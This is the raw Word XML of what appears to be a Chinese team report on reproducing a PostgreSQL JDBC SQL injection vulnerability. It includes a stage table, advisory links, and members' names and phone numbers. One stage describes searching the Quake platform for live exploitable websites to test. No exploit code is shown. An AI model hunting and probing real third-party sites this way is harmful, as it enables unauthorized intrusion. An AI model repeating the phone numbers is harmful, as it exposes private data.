            <w:tcW w:w="172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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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hint="eastAsia" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>钟雨哲</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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hint="default" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>17879630977</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="850" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="172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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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hint="eastAsia" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>吴帅达</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>13375663376</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>PostgreSQL JDBC SQL注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang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环境本地搭建）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc7909"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="18" w:name="_Toc33"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="91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6"/>
        <w:gridCol w:w="6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956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>项目阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6175" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>学习漏洞概况</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6175" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>根据现有信息学习漏洞环境、产生环境</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://www.hackdig.com/08/hack-762021.htm" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>http://www.hackdig.com/08/hack-762021.htm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>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9" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>搭建环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6175" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>下载安装PostgreSQL（versions 42.2.25）与java8,使用Navicat连接数据库，编写和漏洞产生相适配的web环境</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>即保证1)数据库列名可控2)表内有数据3)调用了next()函数。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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>理解漏洞产生原因、条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6175" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>根据文档查看函数ResultSet.refreshRow()的源码，查询该SQL注入漏洞产生的原因，分析总结漏洞产生条件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4" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>查找实战环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6175" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>根据PostgresSQL信息在quake平台查找、过滤漏洞可利用网站进行测试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0" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>提交POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6175" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>按照漏洞复现的流程，结合抓包结果和POC框架，编写poc代码，实现自动漏洞测试验证</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>提交至平台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc1860"/>
      <w:bookmarkStart w:id="20" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="21" w:name="_Toc18669"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14"/>
        <w:tblW w:w="87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651"/>
        <w:gridCol w:w="5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03" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>风险描述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4" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1403" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
